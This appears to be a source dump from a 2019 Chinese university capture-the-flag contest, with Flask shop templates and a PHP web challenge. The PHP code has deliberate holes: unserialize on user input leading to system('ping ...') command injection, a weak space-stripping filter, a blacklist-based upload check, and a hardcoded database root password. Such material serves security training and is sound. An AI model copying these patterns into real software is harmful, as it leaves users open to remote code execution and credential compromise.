23 | {% endfor %} 24 | {% else %} 25 | 尚未添加任何商品 点击此处添加 26 | {% endif %} 27 | 28 | {% endblock info %} 29 | -------------------------------------------------------------------------------- /Flaskshop/taobao/templates/supplier_account.html: -------------------------------------------------------------------------------- 1 | {% extends "account_layout.html" %} 2 | {% block info %} 3 |
4 |
5 | 管理我的商品
6 | 管理雇员
7 | 管理我的基本信息
8 | 完善我的其他信息
9 | 10 | {% endblock info %} 11 | -------------------------------------------------------------------------------- /Flaskshop/taobao/templates/supplier_add_product_count.html: -------------------------------------------------------------------------------- 1 | {% extends "layout.html" %} 2 | {% block content %} 3 |
4 |
5 | {{ form.hidden_tag() }} 6 |
7 | 增加商品库存 8 |
9 | {{ form.count.label(class="form-control-label") }} 10 | {% if form.count.errors %} 11 | {{ form.count(class="form-control form-control-lg is-invalid") }} 12 |
13 | {% for error in form.count.errors %} 14 | {{ error }} 15 | {% endfor %} 16 |
17 | {% else %} 18 | {{ form.count(class="form-control form-control-lg") }} 19 | {% endif %} 20 |
21 |
22 | {{ form.confirm.label(class="form-control-label") }} 23 | {% if form.confirm.errors %} 24 | {{ form.confirm(class="form-control form-control-lg is-invalid") }} 25 |
26 | {% for error in form.confirm.errors %} 27 | {{ error }} 28 | {% endfor %} 29 |
30 | {% else %} 31 | {{ form.confirm(class="form-control form-control-lg") }} 32 | {% endif %} 33 |
34 |
35 |
36 | {{ form.submit(class="btn btn-outline-info") }} 37 |
38 |
39 |
40 | {% endblock content %} 41 | -------------------------------------------------------------------------------- /Flaskshop/taobao/templates/supplier_crew_manager.html: -------------------------------------------------------------------------------- 1 | {% extends "account_layout.html" %} 2 | {% block info %} 3 | 去人才市场看看,雇几个伙计??
4 | 查看我的雇员
5 | 6 | {% endblock info %} 7 | -------------------------------------------------------------------------------- /Flaskshop/taobao/templates/supplier_product_manager.html: -------------------------------------------------------------------------------- 1 | {% extends "account_layout.html" %} 2 | {% block info %} 3 |

商品管理

4 | 5 | 添加产品
6 | 查看我的产品
7 | 8 | {% endblock info %} 9 | -------------------------------------------------------------------------------- /Flaskshop/taobao/templates/traning_orders.html: -------------------------------------------------------------------------------- 1 | {% extends "account_layout.html" %} 2 | {% block info %} 3 |

送货中的订单


4 | {% if orders %} 5 | {% for order in orders %} 6 |
7 | 订单编号:{{ order.id}}
8 | 下单时间:{{ order.start_time}}
9 | 订单价格:{{ order.total_price }}
10 | 订单的状态:成功发货,正在派送
11 | 订单详情

12 | 我很满意,确认收货 13 |
14 | {% endfor %} 15 | {% else %} 16 | 空空如也,什么也没有哦。 17 | {% endif %} 18 | 19 | {% endblock info %} 20 | -------------------------------------------------------------------------------- /Flaskshop/taobao/templates/update_customer_detail.html: -------------------------------------------------------------------------------- 1 | {% extends "layout.html" %} 2 | {% block content %} 3 |
4 |
5 | {{ form.hidden_tag() }} 6 |
7 | 修改收获地址 8 |
9 | {{ form.consignee.label(class="form-control-label") }} 10 | 11 | {% if form.consignee.errors %} 12 | {{ form.consignee(class="form-control form-control-lg is-invalid") }} 13 |
14 | {% for error in form.consignee.errors %} 15 | {{ error }} 16 | {% endfor %} 17 |
18 | {% else %} 19 | {{ form.consignee(class="form-control form-control-lg") }} 20 | {% endif %} 21 |
22 |
23 | {{ form.address.label(class="form-control-label") }} 24 | 25 | {% if form.address.errors %} 26 | {{ form.address(class="form-control form-control-lg is-invalid") }} 27 |
28 | {% for error in form.address.errors %} 29 | {{ error }} 30 | {% endfor %} 31 |
32 | {% else %} 33 | {{ form.address(class="form-control form-control-lg") }} 34 | {% endif %} 35 |
36 |
37 | {{ form.telephone.label(class="form-control-label") }} 38 | {% if form.telephone.errors %} 39 | {{ form.telephone(class="form-control form-control-lg is-invalid") }} 40 |
41 | {% for error in form.telephone.errors %} 42 | {{ error }} 43 | {% endfor %} 44 |
45 | {% else %} 46 | {{ form.telephone(class="form-control form-control-lg") }} 47 | {% endif %} 48 |
49 |
50 |
51 | {{ form.submit(class="btn btn-outline-info") }} 52 |
53 |
54 |
55 | {% endblock content %} 56 | -------------------------------------------------------------------------------- /Flaskshop/taobao/templates/update_info.html: -------------------------------------------------------------------------------- 1 | {% extends "layout.html" %} 2 | {% block content %} 3 |
4 | 点击此处修改我的密码 5 |
6 |
7 |
8 | {{ form.hidden_tag() }} 9 |
10 | 更新我的基本信息 11 |
12 | {{ form.username.label(class="form-control-label") }} 13 | 14 | {% if form.username.errors %} 15 | {{ form.username(class="form-control form-control-lg is-invalid") }} 16 |
17 | {% for error in form.username.errors %} 18 | {{ error }} 19 | {% endfor %} 20 |
21 | {% else %} 22 | {{ form.username(class="form-control form-control-lg") }} 23 | {% endif %} 24 |
25 |
26 | {{ form.email.label(class="form-control-label") }} 27 | {% if form.email.errors %} 28 | {{ form.email(class="form-control form-control-lg is-invalid") }} 29 |
30 | {% for error in form.email.errors %} 31 | {{ error }} 32 | {% endfor %} 33 |
34 | {% else %} 35 | {{ form.email(class="form-control form-control-lg") }} 36 | {% endif %} 37 |
38 |
39 |
40 | {{ form.submit(class="btn btn-outline-info") }} 41 |
42 |
43 |
44 | 45 | {% endblock content %} 46 | -------------------------------------------------------------------------------- /Flaskshop/taobao/templates/update_password.html: -------------------------------------------------------------------------------- 1 | {% extends "layout.html" %} 2 | {% block content %} 3 | 4 |
5 |
6 | {{ form.hidden_tag() }} 7 |
8 | 更新我的密码 9 |
10 | {{ form.password.label(class="form-control-label") }} 11 | 12 | {% if form.password.errors %} 13 | {{ form.password(class="form-control form-control-lg is-invalid") }} 14 |
15 | {% for error in form.password.errors %} 16 | {{ error }} 17 | {% endfor %} 18 |
19 | {% else %} 20 | {{ form.password(class="form-control form-control-lg") }} 21 | {% endif %} 22 |
23 |
24 | {{ form.confirm_password.label(class="form-control-label") }} 25 | {% if form.confirm_password.errors %} 26 | {{ form.confirm_password(class="form-control form-control-lg is-invalid") }} 27 |
28 | {% for error in form.confirm_password.errors %} 29 | {{ error }} 30 | {% endfor %} 31 |
32 | {% else %} 33 | {{ form.confirm_password(class="form-control form-control-lg") }} 34 | {% endif %} 35 |
36 |
37 |
38 | {{ form.submit(class="btn btn-outline-info") }} 39 |
40 |
41 |
42 | 43 | {% endblock content %} 44 | -------------------------------------------------------------------------------- /Flaskshop/taobao/templates/upload.html: -------------------------------------------------------------------------------- 1 | {% extends "layout.html" %} 2 | {% block content %} 3 | 4 | 5 | 6 | 7 | upload 8 | 9 | 10 |

文件上传

11 |
12 | 13 | 14 |
15 | {{msg}} 16 | 17 | 18 | 19 | {% endblock content %} 20 | -------------------------------------------------------------------------------- /Flaskshop/taobao/templates/waitting_orders.html: -------------------------------------------------------------------------------- 1 | {% extends "account_layout.html" %} 2 | {% block info %} 3 |

等待发货的订单


4 | {% if orders %} 5 | {% for order in orders %} 6 |
7 | 订单编号:{{ order.id}}
8 | 下单时间:{{ order.start_time}}
9 | 订单价格:{{ order.total_price }}
10 | 订单的状态:应经成功付款,但尚未发货
11 | 订单详情 12 | 13 | 14 |         取消订单 15 | 16 |
17 | {% endfor %} 18 | {% else %} 19 | 空空如也,什么也没有哦。 20 | {% endif %} 21 | 22 | {% endblock info %} 23 | -------------------------------------------------------------------------------- /Flaskshop/writeup.pdf: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/GinkgoTeam/YJTZB_2019/7acb23f145ff70e09baade92e6b5a65856b36a1e/Flaskshop/writeup.pdf -------------------------------------------------------------------------------- /LICENSE: -------------------------------------------------------------------------------- 1 | MIT License 2 | 3 | Copyright (c) 2019 GinkgoTeam 4 | 5 | Permission is hereby granted, free of charge, to any person obtaining a copy 6 | of this software and associated documentation files (the "Software"), to deal 7 | in the Software without restriction, including without limitation the rights 8 | to use, copy, modify, merge, publish, distribute, sublicense, and/or sell 9 | copies of the Software, and to permit persons to whom the Software is 10 | furnished to do so, subject to the following conditions: 11 | 12 | The above copyright notice and this permission notice shall be included in all 13 | copies or substantial portions of the Software. 14 | 15 | THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR 16 | IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, 17 | FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE 18 | AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER 19 | LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, 20 | OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE 21 | SOFTWARE. 22 | -------------------------------------------------------------------------------- /README.md: -------------------------------------------------------------------------------- 1 | # 2019应急挑战杯 2 | 2019年”应急挑战杯“大学生网络安全邀请赛题目源码及writeUP 3 | -------------------------------------------------------------------------------- /easyWEB/docker-compose.yml: -------------------------------------------------------------------------------- 1 | version: "2" 2 | services: 3 | web1: 4 | build: ./web1 5 | container_name: 0511_web1 6 | volumes: 7 | - /web1flag:/flag 8 | - ./web1/code/:/var/www/html 9 | restart: always 10 | ports: 11 | - "8000:80" 12 | -------------------------------------------------------------------------------- /easyWEB/web1/Dockerfile: -------------------------------------------------------------------------------- 1 | FROM ubuntu:14.04 2 | 3 | COPY html/ /var/www/html/ 4 | 5 | RUN sed -i 's/http:\/\/archive.ubuntu.com\/ubuntu\//http:\/\/mirrors.tuna.tsinghua.edu.cn\/ubuntu\//g' /etc/apt/sources.list && \ 6 | sed -i '/security/d' /etc/apt/sources.list && \ 7 | apt-get update -y && \ 8 | apt-get -yqq install supervisor mariadb-server apache2 php5 libapache2-mod-php5 \ 9 | php5-mysql php5-mcrypt ssh && \ 10 | # config 11 | sed -i "154s/Indexes//" /etc/apache2/apache2.conf && \ 12 | sed -i "165s/Indexes//" /etc/apache2/apache2.conf && \ 13 | /etc/init.d/apache2 start && \ 14 | # mysql 15 | rm -rf /var/lib/mysql && \ 16 | mysql_install_db --user=mysql --datadir=/var/lib/mysql && \ 17 | sh -c 'mysqld_safe &' && \ 18 | sleep 5s && \ 19 | mysqladmin -uroot password '334cc35b3c704593' && \ 20 | mysql -e "source /var/www/html/geez.sql;" -uroot -p334cc35b3c704593 21 | # supervisor 22 | RUN mkdir -p /var/log/supervisor && \ 23 | mv /var/www/html/supervisord.conf /etc/ && \ 24 | # 25 | chown -R www-data:www-data /var/www/html/ && \ 26 | chmod -R 755 /var/www/html/ && \ 27 | rm /var/www/html/geez.sql /var/www/html/index.html && \ 28 | cat /dev/null > /var/www/html/log.php 29 | 30 | EXPOSE 80 31 | 32 | ENTRYPOINT ["supervisord", "-n"] 33 | -------------------------------------------------------------------------------- /easyWEB/web1/html/common/cacf.php: -------------------------------------------------------------------------------- 1 | test); 8 | fclose($fp); 9 | } 10 | } 11 | //判断是否是序列化 12 | function is_serialized( $data ) { 13 | $data = trim( $data ); 14 | if ( 'N;' == $data ) 15 | return true; 16 | if ( !preg_match( '/^([adObis]):/', $data, $badions ) ) 17 | return false; 18 | switch ( $badions[1] ) { 19 | case 'a' : 20 | case 'O' : 21 | case 's' : 22 | if ( preg_match( "/^{$badions[1]}:[0-9]+:.*[;}]\$/s", $data ) ) 23 | return true; 24 | break; 25 | case 'b' : 26 | case 'i' : 27 | case 'd' : 28 | if ( preg_match( "/^{$badions[1]}:[0-9.E-]+;\$/", $data ) ) 29 | return true; 30 | break; 31 | } 32 | return false; 33 | } 34 | 35 | 36 | if(isset($_POST['name'])){ 37 | $post_data=$_POST['name']; 38 | if(is_serialized($post_data)){ 39 | echo $post_data; 40 | unserialize($post_data); 41 | } 42 | else{ 43 | echo "Hello ".$post_data.",Your resume scored ".mt_rand(60,100)." points"; 44 | } 45 | 46 | } 47 | else{ 48 | echo("请输入你的名字"); 49 | } 50 | 51 | // $class4 = new chybeta(); 52 | // $class4->test = ''; 53 | // $class4_ser = serialize($class4); 54 | // print_r($class4_ser); 55 | ?> 56 | 57 |
58 | 59 | 60 |
61 | -------------------------------------------------------------------------------- /easyWEB/web1/html/common/function.php: -------------------------------------------------------------------------------- 1 | '.$action.'();'); 21 | } 22 | } 23 | 24 | 25 | 26 | ?> 27 | -------------------------------------------------------------------------------- /easyWEB/web1/html/common/home.php: -------------------------------------------------------------------------------- 1 | method = $method; 11 | $this->args = $args; 12 | } 13 | 14 | function __destruct(){ 15 | if (in_array($this->method, array("ping"))) { 16 | call_user_func_array(array($this, $this->method), $this->args); 17 | } 18 | } 19 | 20 | function ping($host){ 21 | system("ping -c 2 $host"); 22 | } 23 | function waf($str){ 24 | $str=str_replace(' ','',$str); 25 | return $str; 26 | } 27 | 28 | function __wakeup(){ 29 | foreach($this->args as $k => $v) { 30 | $this->args[$k] = $this->waf(trim(mysql_escape_string($v))); 31 | } 32 | } 33 | } 34 | $a=@$_POST['a']; 35 | @unserialize(base64_decode($a)); 36 | ?> 37 | -------------------------------------------------------------------------------- /easyWEB/web1/html/geez.sql: -------------------------------------------------------------------------------- 1 | # Host: 127.0.0.1 (Version: 5.5.53) 2 | # Date: 2018-10-20 19:40:25 3 | # Generator: MySQL-Front 5.3 (Build 4.234) 4 | 5 | /*!40101 SET NAMES utf8 */; 6 | 7 | # 8 | # Structure for table "users" 9 | # 10 | 11 | 12 | SET SQL_MODE = "NO_AUTO_VALUE_ON_ZERO"; 13 | SET AUTOCOMMIT = 0; 14 | START TRANSACTION; 15 | SET time_zone = "+00:00"; 16 | 17 | DROP DATABASE IF EXISTS `geez`; 18 | CREATE DATABASE `geez` DEFAULT CHARACTER SET utf8mb4 COLLATE utf8mb4_unicode_ci; 19 | USE geez; 20 | 21 | DROP TABLE IF EXISTS `users`; 22 | CREATE TABLE `users` ( 23 | `username` varchar(30) NOT NULL, 24 | `phonenumber` varchar(20) DEFAULT NULL, 25 | `QQ` varchar(20) DEFAULT NULL, 26 | `email` varchar(20) DEFAULT NULL, 27 | `photo` varchar(255) DEFAULT NULL, 28 | `reward` varchar(255) DEFAULT NULL, 29 | `motto` varchar(255) DEFAULT NULL, 30 | `sex` int(1) NOT NULL, 31 | `id` int(5) NOT NULL AUTO_INCREMENT, 32 | `age` int(3) NOT NULL, 33 | `password` varchar(50) NOT NULL, 34 | `birthday` varchar(255) DEFAULT '19970911', 35 | PRIMARY KEY (`id`) 36 | ) ENGINE=MyISAM AUTO_INCREMENT=3 DEFAULT CHARSET=utf8; 37 | 38 | # 39 | # Data for table "users" 40 | # 41 | 42 | /*!40000 ALTER TABLE `users` DISABLE KEYS */; 43 | INSERT INTO `users` VALUES ('admin',NULL,NULL,NULL,'./upload/admin_xf.jpg','装13一等奖!抄写部长名字一等奖',NULL,0,1,19,'23e38db370b570dbd07added13dfc001','19970911'); 44 | /*!40000 ALTER TABLE `users` ENABLE KEYS */; 45 | -------------------------------------------------------------------------------- /easyWEB/web1/html/include/config.php: -------------------------------------------------------------------------------- 1 | 15 | -------------------------------------------------------------------------------- /easyWEB/web1/html/include/log1.php: -------------------------------------------------------------------------------- 1 | 10 | -------------------------------------------------------------------------------- /easyWEB/web1/html/include/shell.php: -------------------------------------------------------------------------------- 1 | -------------------------------------------------------------------------------- /easyWEB/web1/html/index.php: -------------------------------------------------------------------------------- 1 | 16 | -------------------------------------------------------------------------------- /easyWEB/web1/html/lib/File.php: -------------------------------------------------------------------------------- 1 | typelist==array("image/jpeg","image/jpg","image/png","image/gif"); 15 | $this->notallow=array("php", "php5", "php3", "php4", "php7", "pht", "phtml", "htaccess","html", "swf", "htm"); 16 | $this->path='./upload'; 17 | } 18 | 19 | function save(){ 20 | 21 | $id=$_SESSION['id']; 22 | $upfile=$_FILES['pic']; 23 | $fileinfo=pathinfo($upfile["name"]); 24 | if(in_array($fileinfo["extension"],$this->notallow)){ 25 | exit('error'); 26 | } 27 | $path='./upload/'.$id."_".$fileinfo["filename"].".".strtolower($fileinfo["extension"]); 28 | if (file_exists($path)){ 29 | exit("file already exists"); 30 | } 31 | if(move_uploaded_file($upfile['tmp_name'], $path)){ 32 | //return True; 33 | return $path; 34 | }else{ 35 | return False; 36 | } 37 | } 38 | } 39 | ?> 40 | -------------------------------------------------------------------------------- /easyWEB/web1/html/lib/base.php: -------------------------------------------------------------------------------- 1 | tp= new Smarty(); 13 | $this->tp->left_delimiter='{'; 14 | $this->tp->right_delimiter='}'; 15 | $this->tp->template_dir='templates'; //html模板地址 16 | $this->tp->compile_dir='template_c'; //编译生成的文件 17 | $this->tp->cache_dir='cache'; //缓存 18 | $this->tp->caching=false; //开启缓存 19 | $this->tp->cache_lifetime=120;//缓存时间 20 | } 21 | } 22 | 23 | 24 | 25 | ?> -------------------------------------------------------------------------------- /easyWEB/web1/html/lib/run.php: -------------------------------------------------------------------------------- 1 | -------------------------------------------------------------------------------- /easyWEB/web1/html/org/smarty/Autofoucer.php: -------------------------------------------------------------------------------- 1 | -------------------------------------------------------------------------------- /easyWEB/web1/html/org/smarty/plugins/function.counter.php: -------------------------------------------------------------------------------- 1 | 12 | * Name: counter
13 | * Purpose: print out a counter value 14 | * 15 | * @author Monte Ohrt 16 | * @link http://www.smarty.net/manual/en/language.function.counter.php {counter} 17 | * (Smarty online manual) 18 | * 19 | * @param array $params parameters 20 | * @param Smarty_Internal_Template $template template object 21 | * 22 | * @return string|null 23 | */ 24 | function smarty_function_counter($params, $template) 25 | { 26 | static $counters = array(); 27 | 28 | $name = (isset($params['name'])) ? $params['name'] : 'default'; 29 | if (!isset($counters[$name])) { 30 | $counters[$name] = array( 31 | 'start' => 1, 32 | 'skip' => 1, 33 | 'direction' => 'up', 34 | 'count' => 1 35 | ); 36 | } 37 | $counter =& $counters[$name]; 38 | 39 | if (isset($params['start'])) { 40 | $counter['start'] = $counter['count'] = (int) $params['start']; 41 | } 42 | 43 | if (!empty($params['assign'])) { 44 | $counter['assign'] = $params['assign']; 45 | } 46 | 47 | if (isset($counter['assign'])) { 48 | $template->assign($counter['assign'], $counter['count']); 49 | } 50 | 51 | if (isset($params['print'])) { 52 | $print = (bool) $params['print']; 53 | } else { 54 | $print = empty($counter['assign']); 55 | } 56 | 57 | if ($print) { 58 | $retval = $counter['count']; 59 | } else { 60 | $retval = null; 61 | } 62 | 63 | if (isset($params['skip'])) { 64 | $counter['skip'] = $params['skip']; 65 | } 66 | 67 | if (isset($params['direction'])) { 68 | $counter['direction'] = $params['direction']; 69 | } 70 | 71 | if ($counter['direction'] == "down") { 72 | $counter['count'] -= $counter['skip']; 73 | } else { 74 | $counter['count'] += $counter['skip']; 75 | } 76 | 77 | return $retval; 78 | } 79 | -------------------------------------------------------------------------------- /easyWEB/web1/html/org/smarty/plugins/modifier.date_format.php: -------------------------------------------------------------------------------- 1 | 12 | * Name: date_format
13 | * Purpose: format datestamps via strftime
14 | * Input:
15 | * - string: input date string 16 | * - format: strftime format for output 17 | * - default_date: default date if $string is empty 18 | * 19 | * @link http://www.smarty.net/manual/en/language.modifier.date.format.php date_format (Smarty online manual) 20 | * @author Monte Ohrt 21 | * 22 | * @param string $string input date string 23 | * @param string $format strftime format for output 24 | * @param string $default_date default date if $string is empty 25 | * @param string $formatter either 'strftime' or 'auto' 26 | * 27 | * @return string |void 28 | * @uses smarty_make_timestamp() 29 | */ 30 | function smarty_modifier_date_format($string, $format = null, $default_date = '', $formatter = 'auto') 31 | { 32 | if ($format === null) { 33 | $format = Smarty::$_DATE_FORMAT; 34 | } 35 | /** 36 | * require_once the {@link shared.make_timestamp.php} plugin 37 | */ 38 | require_once(SMARTY_PLUGINS_DIR . 'shared.make_timestamp.php'); 39 | if ($string != '' && $string != '0000-00-00' && $string != '0000-00-00 00:00:00') { 40 | $timestamp = smarty_make_timestamp($string); 41 | } elseif ($default_date != '') { 42 | $timestamp = smarty_make_timestamp($default_date); 43 | } else { 44 | return; 45 | } 46 | if ($formatter == 'strftime' || ($formatter == 'auto' && strpos($format, '%') !== false)) { 47 | if (DS == '\\') { 48 | $_win_from = array('%D', '%h', '%n', '%r', '%R', '%t', '%T'); 49 | $_win_to = array('%m/%d/%y', '%b', "\n", '%I:%M:%S %p', '%H:%M', "\t", '%H:%M:%S'); 50 | if (strpos($format, '%e') !== false) { 51 | $_win_from[] = '%e'; 52 | $_win_to[] = sprintf('%\' 2d', date('j', $timestamp)); 53 | } 54 | if (strpos($format, '%l') !== false) { 55 | $_win_from[] = '%l'; 56 | $_win_to[] = sprintf('%\' 2d', date('h', $timestamp)); 57 | } 58 | $format = str_replace($_win_from, $_win_to, $format); 59 | } 60 | 61 | return strftime($format, $timestamp); 62 | } else { 63 | return date($format, $timestamp); 64 | } 65 | } 66 | -------------------------------------------------------------------------------- /easyWEB/web1/html/org/smarty/plugins/modifier.regex_replace.php: -------------------------------------------------------------------------------- 1 | 12 | * Name: regex_replace
13 | * Purpose: regular expression search/replace 14 | * 15 | * @link http://smarty.php.net/manual/en/language.modifier.regex.replace.php 16 | * regex_replace (Smarty online manual) 17 | * @author Monte Ohrt 18 | * 19 | * @param string $string input string 20 | * @param string|array $search regular expression(s) to search for 21 | * @param string|array $replace string(s) that should be replaced 22 | * 23 | * @return string 24 | */ 25 | function smarty_modifier_regex_replace($string, $search, $replace) 26 | { 27 | if (is_array($search)) { 28 | foreach ($search as $idx => $s) { 29 | $search[$idx] = _smarty_regex_replace_check($s); 30 | } 31 | } else { 32 | $search = _smarty_regex_replace_check($search); 33 | } 34 | 35 | return preg_replace($search, $replace, $string); 36 | } 37 | 38 | /** 39 | * @param string $search string(s) that should be replaced 40 | * 41 | * @return string 42 | * @ignore 43 | */ 44 | function _smarty_regex_replace_check($search) 45 | { 46 | // null-byte injection detection 47 | // anything behind the first null-byte is ignored 48 | if (($pos = strpos($search, "\0")) !== false) { 49 | $search = substr($search, 0, $pos); 50 | } 51 | // remove eval-modifier from $search 52 | if (preg_match('!([a-zA-Z\s]+)$!s', $search, $match) && (strpos($match[1], 'e') !== false)) { 53 | $search = substr($search, 0, - strlen($match[1])) . preg_replace('![e\s]+!', '', $match[1]); 54 | } 55 | 56 | return $search; 57 | } 58 | -------------------------------------------------------------------------------- /easyWEB/web1/html/org/smarty/plugins/modifier.replace.php: -------------------------------------------------------------------------------- 1 | 12 | * Name: replace
13 | * Purpose: simple search/replace 14 | * 15 | * @link http://smarty.php.net/manual/en/language.modifier.replace.php replace (Smarty online manual) 16 | * @author Monte Ohrt 17 | * @author Uwe Tews 18 | * 19 | * @param string $string input string 20 | * @param string $search text to search for 21 | * @param string $replace replacement text 22 | * 23 | * @return string 24 | */ 25 | function smarty_modifier_replace($string, $search, $replace) 26 | { 27 | if (Smarty::$_MBSTRING) { 28 | require_once(SMARTY_PLUGINS_DIR . 'shared.mb_str_replace.php'); 29 | 30 | return smarty_mb_str_replace($search, $replace, $string); 31 | } 32 | 33 | return str_replace($search, $replace, $string); 34 | } 35 | -------------------------------------------------------------------------------- /easyWEB/web1/html/org/smarty/plugins/modifier.spacify.php: -------------------------------------------------------------------------------- 1 | 12 | * Name: spacify
13 | * Purpose: add spaces between characters in a string 14 | * 15 | * @link http://smarty.php.net/manual/en/language.modifier.spacify.php spacify (Smarty online manual) 16 | * @author Monte Ohrt 17 | * 18 | * @param string $string input string 19 | * @param string $spacify_char string to insert between characters. 20 | * 21 | * @return string 22 | */ 23 | function smarty_modifier_spacify($string, $spacify_char = ' ') 24 | { 25 | // well… what about charsets besides latin and UTF-8? 26 | return implode($spacify_char, preg_split('//' . Smarty::$_UTF8_MODIFIER, $string, - 1, PREG_SPLIT_NO_EMPTY)); 27 | } 28 | -------------------------------------------------------------------------------- /easyWEB/web1/html/org/smarty/plugins/modifier.truncate.php: -------------------------------------------------------------------------------- 1 | 12 | * Name: truncate
13 | * Purpose: Truncate a string to a certain length if necessary, 14 | * optionally splitting in the middle of a word, and 15 | * appending the $etc string or inserting $etc into the middle. 16 | * 17 | * @link http://smarty.php.net/manual/en/language.modifier.truncate.php truncate (Smarty online manual) 18 | * @author Monte Ohrt 19 | * 20 | * @param string $string input string 21 | * @param integer $length length of truncated text 22 | * @param string $etc end string 23 | * @param boolean $break_words truncate at word boundary 24 | * @param boolean $middle truncate in the middle of text 25 | * 26 | * @return string truncated string 27 | */ 28 | function smarty_modifier_truncate($string, $length = 80, $etc = '...', $break_words = false, $middle = false) 29 | { 30 | if ($length == 0) { 31 | return ''; 32 | } 33 | 34 | if (Smarty::$_MBSTRING) { 35 | if (mb_strlen($string, Smarty::$_CHARSET) > $length) { 36 | $length -= min($length, mb_strlen($etc, Smarty::$_CHARSET)); 37 | if (!$break_words && !$middle) { 38 | $string = preg_replace('/\s+?(\S+)?$/' . Smarty::$_UTF8_MODIFIER, '', mb_substr($string, 0, $length + 1, Smarty::$_CHARSET)); 39 | } 40 | if (!$middle) { 41 | return mb_substr($string, 0, $length, Smarty::$_CHARSET) . $etc; 42 | } 43 | 44 | return mb_substr($string, 0, $length / 2, Smarty::$_CHARSET) . $etc . mb_substr($string, - $length / 2, $length, Smarty::$_CHARSET); 45 | } 46 | 47 | return $string; 48 | } 49 | 50 | // no MBString fallback 51 | if (isset($string[$length])) { 52 | $length -= min($length, strlen($etc)); 53 | if (!$break_words && !$middle) { 54 | $string = preg_replace('/\s+?(\S+)?$/', '', substr($string, 0, $length + 1)); 55 | } 56 | if (!$middle) { 57 | return substr($string, 0, $length) . $etc; 58 | } 59 | 60 | return substr($string, 0, $length / 2) . $etc . substr($string, - $length / 2); 61 | } 62 | 63 | return $string; 64 | } 65 | -------------------------------------------------------------------------------- /easyWEB/web1/html/org/smarty/plugins/modifiercompiler.cat.php: -------------------------------------------------------------------------------- 1 | 12 | * Name: cat
13 | * Date: Feb 24, 2003
14 | * Purpose: catenate a value to a variable
15 | * Input: string to catenate
16 | * Example: {$var|cat:"foo"} 17 | * 18 | * @link http://smarty.php.net/manual/en/language.modifier.cat.php cat 19 | * (Smarty online manual) 20 | * @author Uwe Tews 21 | * 22 | * @param array $params parameters 23 | * 24 | * @return string with compiled code 25 | */ 26 | function smarty_modifiercompiler_cat($params) 27 | { 28 | return '(' . implode(').(', $params) . ')'; 29 | } 30 | -------------------------------------------------------------------------------- /easyWEB/web1/html/org/smarty/plugins/modifiercompiler.count_characters.php: -------------------------------------------------------------------------------- 1 | 12 | * Name: count_characteres
13 | * Purpose: count the number of characters in a text 14 | * 15 | * @link http://www.smarty.net/manual/en/language.modifier.count.characters.php count_characters (Smarty online manual) 16 | * @author Uwe Tews 17 | * 18 | * @param array $params parameters 19 | * 20 | * @return string with compiled code 21 | */ 22 | function smarty_modifiercompiler_count_characters($params) 23 | { 24 | if (!isset($params[1]) || $params[1] != 'true') { 25 | return 'preg_match_all(\'/[^\s]/' . Smarty::$_UTF8_MODIFIER . '\',' . $params[0] . ', $tmp)'; 26 | } 27 | if (Smarty::$_MBSTRING) { 28 | return 'mb_strlen(' . $params[0] . ', \'' . addslashes(Smarty::$_CHARSET) . '\')'; 29 | } 30 | // no MBString fallback 31 | return 'strlen(' . $params[0] . ')'; 32 | } 33 | -------------------------------------------------------------------------------- /easyWEB/web1/html/org/smarty/plugins/modifiercompiler.count_paragraphs.php: -------------------------------------------------------------------------------- 1 | 12 | * Name: count_paragraphs
13 | * Purpose: count the number of paragraphs in a text 14 | * 15 | * @link http://www.smarty.net/manual/en/language.modifier.count.paragraphs.php 16 | * count_paragraphs (Smarty online manual) 17 | * @author Uwe Tews 18 | * 19 | * @param array $params parameters 20 | * 21 | * @return string with compiled code 22 | */ 23 | function smarty_modifiercompiler_count_paragraphs($params) 24 | { 25 | // count \r or \n characters 26 | return '(preg_match_all(\'#[\r\n]+#\', ' . $params[0] . ', $tmp)+1)'; 27 | } 28 | -------------------------------------------------------------------------------- /easyWEB/web1/html/org/smarty/plugins/modifiercompiler.count_sentences.php: -------------------------------------------------------------------------------- 1 | 12 | * Name: count_sentences 13 | * Purpose: count the number of sentences in a text 14 | * 15 | * @link http://www.smarty.net/manual/en/language.modifier.count.paragraphs.php 16 | * count_sentences (Smarty online manual) 17 | * @author Uwe Tews 18 | * 19 | * @param array $params parameters 20 | * 21 | * @return string with compiled code 22 | */ 23 | function smarty_modifiercompiler_count_sentences($params) 24 | { 25 | // find periods, question marks, exclamation marks with a word before but not after. 26 | return 'preg_match_all("#\w[\.\?\!](\W|$)#S' . Smarty::$_UTF8_MODIFIER . '", ' . $params[0] . ', $tmp)'; 27 | } 28 | -------------------------------------------------------------------------------- /easyWEB/web1/html/org/smarty/plugins/modifiercompiler.count_words.php: -------------------------------------------------------------------------------- 1 | 12 | * Name: count_words
13 | * Purpose: count the number of words in a text 14 | * 15 | * @link http://www.smarty.net/manual/en/language.modifier.count.words.php count_words (Smarty online manual) 16 | * @author Uwe Tews 17 | * 18 | * @param array $params parameters 19 | * 20 | * @return string with compiled code 21 | */ 22 | function smarty_modifiercompiler_count_words($params) 23 | { 24 | if (Smarty::$_MBSTRING) { 25 | // return 'preg_match_all(\'#[\w\pL]+#' . Smarty::$_UTF8_MODIFIER . '\', ' . $params[0] . ', $tmp)'; 26 | // expression taken from http://de.php.net/manual/en/function.str-word-count.php#85592 27 | return 'preg_match_all(\'/\p{L}[\p{L}\p{Mn}\p{Pd}\\\'\x{2019}]*/' . Smarty::$_UTF8_MODIFIER . '\', ' . $params[0] . ', $tmp)'; 28 | } 29 | // no MBString fallback 30 | return 'str_word_count(' . $params[0] . ')'; 31 | } 32 | -------------------------------------------------------------------------------- /easyWEB/web1/html/org/smarty/plugins/modifiercompiler.default.php: -------------------------------------------------------------------------------- 1 | 12 | * Name: default
